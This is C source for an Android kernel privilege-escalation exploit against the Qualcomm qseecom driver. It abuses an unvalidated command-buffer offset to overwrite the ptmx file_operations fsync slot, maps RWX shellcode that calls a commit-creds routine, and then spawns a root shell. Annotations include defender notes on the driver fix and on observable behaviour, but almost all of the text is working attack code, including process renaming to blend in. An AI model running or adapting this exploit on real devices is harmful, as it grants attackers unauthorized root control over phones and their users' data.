/*
 * Overwrites one slot of the kernel's ptmx file_operations table with a
 * user-space function pointer, runs it, and restores the slot.
 *
 * The kernel write is done through a user-space mapping of kernel memory
 * that a separate "install_backdoor" step must have created beforehand
 * (backdoor_open_mmap / backdoor_convert_to_mmaped_address).
 *
 * Returns: false if the fops address is unknown or the mapping cannot be
 *          opened; otherwise whatever run_obtain_root_privilege() returns.
 *
 * Defender note: this only works because the fops table and the mapping are
 * writable from user space. A read-only (const / post-init read-only) fops
 * table would make the store below fault; the presence of a device mapping
 * kernel memory into a process, and an open of /dev/ptmx followed by an
 * fsync() from an untrusted process, are the observable behaviors.
 */
static bool run_exploit(void) {
    void **ptmx_fsync_address;          /* user-space alias of the fops slot */
    unsigned long int ptmx_fops_address; /* kernel address of ptmx_fops */
    int fd;                              /* unused in this function */
    bool ret;

    ptmx_fops_address = get_ptmx_fops_address();
    if (!ptmx_fops_address) {
        return false;
    }
    if (!backdoor_open_mmap()) {
        printf("Failed to mmap due to %s.\n", strerror(errno));
        printf("Run 'install_backdoor' first\n");
        return false;
    }
    /* 0x38 matches the "PTMX_FOPS + 14*4" offset used in main(); the
     * variable name suggests it is the fsync slot of struct file_operations —
     * TODO confirm against the target kernel's struct layout.
     * NOTE: arithmetic on void* is a GNU extension, not standard C. */
    ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)ptmx_fops_address + 0x38);
    *ptmx_fsync_address = obtain_root_privilege;
    ret = run_obtain_root_privilege(NULL);
    /* Restore the slot before unmapping so the kernel table is not left
     * pointing at user memory. */
    *ptmx_fsync_address = NULL;
    backdoor_close_mmap();
    return ret;
}
/*
 * Entry point: drives the qseecom ioctl path to obtain kernel write
 * primitives, places a payload in a fixed RWX mapping, patches the ptmx
 * file_operations table, and finally execs a shell.
 *
 * Sequence as visible in the code:
 *   1. open /dev/qseecom, register a 400-byte user buffer with
 *      QSEECOM_IOCTL_SET_MEM_PARAM_REQ;
 *   2. issue QSEECOM_IOCTL_SEND_MODFD_CMD_REQ with cmd_buf_offset = 0 and
 *      read back two words from the buffer;
 *   3. MAP_FIXED an RWX page at the address read back, copy shell_code2 into
 *      it and patch 0xeeeeeeee placeholders with the address of MyCommitCred;
 *   4. issue the same ioctl again with cmd_buf_offset pointing at
 *      PTMX_FOPS + 14*4 (the same 0x38 offset run_exploit() uses);
 *   5. run_obtain_root_privilege() and execv /system/bin/sh.
 *
 * argc/argv are unused. The (int) casts on pointers assume a 32-bit target —
 * TODO confirm; they truncate on 64-bit.
 *
 * Defender note: the kernel-side fix is bounds-checking cmd_buf_offset
 * against the registered buffer in the qseecom driver and keeping fops
 * tables read-only. Observable host behavior: an untrusted process opening
 * /dev/qseecom, renaming itself via PR_SET_NAME, creating a MAP_FIXED
 * PROT_EXEC anonymous mapping, and then exec'ing a shell.
 */
int main(int argc, char *argv[]){
    printf("mypid %d\n",getpid());
    int ret = -1;
    int fd = open("/dev/qseecom", 0);
    if (fd<0){
        perror("open");
        exit(-1);
    }
    /* 400-byte request/response buffer shared with the driver; the first
     * 24 words are preset to 1. malloc result is not checked. */
    void* abuseBuff = malloc(400);
    memset(abuseBuff,0,400);
    int* intArr = (int*)abuseBuff;
    int j = 0;
    for(j=0;j<24;j++){
        intArr[j] = 0x1;
    }
    struct qseecom_send_modfd_cmd_req ioctlBuff;
    /* Process renames itself (visible in ps/comm); the second rename below
     * appears to mimic an app name — presumably to blend in, TODO confirm. */
    prctl(PR_SET_NAME, "GodFather", 0, 0, 0);
    // if(0==fork()){   -- fork path is commented out; everything runs in this process
    g_pid = getpid();
    g_tgid = g_pid;
    prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);
    // QSEECOM_IOCTL_SET_MEM_PARAM_REQ: register abuseBuff as an 8192-byte
    // shared buffer backed by a dma-buf fd, although only 400 bytes were allocated.
    struct qseecom_set_sb_mem_param_req req;
    req.ifd_data_fd = obtain_dma_buf_fd(8192);
    req.virt_sb_base = abuseBuff;
    req.sb_len = 8192;
    ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
    printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);
    /* Request and response share the same buffer. */
    ioctlBuff.cmd_req_buf = abuseBuff;
    ioctlBuff.cmd_req_len = 400;
    ioctlBuff.resp_buf = abuseBuff;
    ioctlBuff.resp_len = 400;
    int i = 0;
    for (i = 0;i<4;i++){
        ioctlBuff.ifd_data[i].fd = 0;
        ioctlBuff.ifd_data[i].cmd_buf_offset =0;
    }
    /* First pass: offset 0 — cmd_buf_offset is the user-controlled value the
     * driver should be validating. */
    ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
    ioctlBuff.ifd_data[0].cmd_buf_offset = 0; // earlier variant: (int)(0xc03f0ab4 + 8) - (int)abuseBuff;
    printf("QSEECOM_IOCTL_SEND_CMD_REQ");
    ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
    /* NOTE: %p with int arguments is a format/type mismatch (UB). */
    printf("return %p %p\n",intArr[0],intArr[1]);
    perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
    printf("ioctl return 0x%x \n",ret);
    // *(int*)intArr[0] = 0x0;   -- commented out
    /* Map an RWX page at the address the driver wrote back into intArr[0].
     * mmap result is not checked; intArr[0] is passed as an int, not a pointer. */
    void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
    printf("mmap return %p \n",addr);
    /* These two words are immediately overwritten by the memcpy below. */
    *(int*)addr = 0xE3500000;
    *((int*)((int)addr+4)) = 0xe1a0f00e;
    memcpy(addr,shell_code2,400);
    /* Patch placeholder words in the copied payload with MyCommitCred's address
     * (only the first 10 words are scanned). */
    int* arr = (int*)addr;
    for(i=0;i<10;i++){
        if(arr[i] == 0xeeeeeeee) arr[i] = (int)MyCommitCred;
        printf("%p\n",arr[i]);
    }
    // c1334e00 b ptmx_fops   -- symbol address noted by the author for this build
    /* Second pass: point the driver at PTMX_FOPS + 0x38 relative to abuseBuff. */
    ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;
    printf("QSEECOM_IOCTL_SEND_CMD_REQ");
    ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
    printf("return %p %p\n",intArr[0],intArr[1]);
    perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
    printf("ioctl return 0x%x \n",ret);
    /* Trigger the patched fops entry, then replace this process with a shell.
     * execv only returns on failure. */
    run_obtain_root_privilege();
    char * argv1[]={"sh",(char *)0};
    int result = execv("/system/bin/sh", argv1);
    if(result){
        perror("execv");
    }
    return 0;
}